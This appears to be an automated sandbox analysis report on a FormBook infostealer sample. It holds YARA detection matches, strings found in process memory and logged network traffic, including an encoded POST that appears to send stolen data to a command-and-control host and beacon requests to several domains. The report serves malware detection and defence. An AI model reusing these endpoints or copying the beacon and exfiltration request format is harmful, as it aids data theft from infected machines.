20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:25:56 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4Bm5oT6L32EHhQScn%2FtDbeMq%2BGSCtJ4rHUlR%2F9gG1wt8%2FwTsgoIiTesoXJRrMBYYUrbydAF9DG4SBVpxme%2F4Q6xkkqvRLysGUpAO2uDyfGHGC9THh5E8MONAvbn6lHBEf9ryiEAkI5ZF4vZzenvFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bc54f76cb33-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jaa7kcfd7bhqdLX%2BdsVwejqS0LNj%2B78qOvyX9vxAKUqLl0zphihGHPKzcKLvxmdQpMSPuS62wkF%2B2VPDre1rQCML7ysqKeZLpQKERY5%2Fpc0doM%2BigaFk2AS6tyy2cLB5INHeF6%2FnLbEv1IZyRvjzOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bd20dfdcb0d-DUSContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d c8 30 b4 b3 d1 87 4a 83 ec 2a b2 83 29 ce 4b cf cc ab 40 96 d3 07 99 0e 66 40 5d 06 00 00 00 ff ff 03 00 90 3b 34 31 a2 00 00 00 0d 0a Data Ascii: 84(HML),I310Q/Qp/Kr$T*$'*gd*SJRl2M0J*)K@f@];41
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 17:26:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Clw8fY7BTlk%2BiuvgOg38eNqUX%2BGkg%2FfQmp23yaEcJNSKPLcsQppB4ilga4hDWbNYtsCNEfZxXpq%2BFcatW2a3IHfDbDeR20jL6T6YaLWHd83aJ2ntsmrCUXAOGPyWH8DcwEGCG9SmWqqhZrRcNN9ynw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 771d0bdedcba9b83-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: 1--Lt08NN.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
      Source: 1--Lt08NN.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
      Source: NETSTAT.EXE, 0000000A.00000002.501856289.00000000042BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Kanit:200
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
      Source: 1--Lt08NN.10.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
      Source: 1--Lt08NN.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: unknownHTTP traffic detected: POST /4u5a/ HTTP/1.1Host: www.dersameh.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.dersameh.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dersameh.com/4u5a/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 30 47 58 3d 4f 4d 55 79 49 34 48 4b 35 31 32 2d 67 55 49 7a 31 2d 55 52 64 63 28 79 52 35 48 51 7e 59 4c 4c 35 72 75 31 30 79 78 5a 6b 52 36 5f 76 35 64 77 58 51 59 4e 35 56 4c 5a 6b 66 43 4b 44 4c 75 4c 28 46 76 59 79 38 4b 33 78 72 33 55 32 38 37 33 28 36 58 61 54 56 44 39 4a 69 53 7a 62 51 55 45 64 6d 57 53 53 45 59 6a 4b 4c 68 4a 28 6e 61 47 54 67 61 49 66 65 35 64 4a 72 4b 55 73 41 68 57 56 47 76 44 4b 61 43 54 77 78 78 39 38 34 77 68 4c 53 30 69 51 37 67 37 48 31 63 69 4e 79 45 48 30 58 30 39 51 39 61 64 39 36 4e 69 68 59 77 5f 6b 74 7a 49 28 57 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: l0GX=OMUyI4HK512-gUIz1-URdc(yR5HQ~YLL5ru10yxZkR6_v5dwXQYN5VLZkfCKDLuL(FvYy8K3xr3U2873(6XaTVD9JiSzbQUEdmWSSEYjKLhJ(naGTgaIfe5dJrKUsAhWVGvDKaCTwxx984whLS0iQ7g7H1ciNyEH0X09Q9ad96NihYw_ktzI(Wo.
      Source: unknownDNS traffic detected: queries for: www.ope-cctv.com
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed HTTP/1.1Host: www.ope-cctv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s HTTP/1.1Host: www.dersameh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2 HTTP/1.1Host: www.darkchocolatebliss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s HTTP/1.1Host: www.y31jaihdb6zm87.buzzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m HTTP/1.1Host: www.marketmall.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /4u5a/?l0GX=oAzQ4htCGi4nqSyuBtGVfUCtoVNBPGpnnjqt2pSGyg/seKLGD+qTa4VfLqEZsFdX3QB0KgbSd28tsjFwPlPYkk5JGWRtP+2k/VY6r0frt1hO&GFQD=d2J0s HTTP/1.1Host: www.canadianlocalbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.318189289.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: RegSvcs.exe PID: 5148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: NETSTAT.EXE PID: 4844, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013141201_2_01314120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_012FF9001_2_012FF900
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013199BF1_2_013199BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0131A8301_2_0131A830
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013CE8241_2_013CE824
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_013B10021_2_013B1002
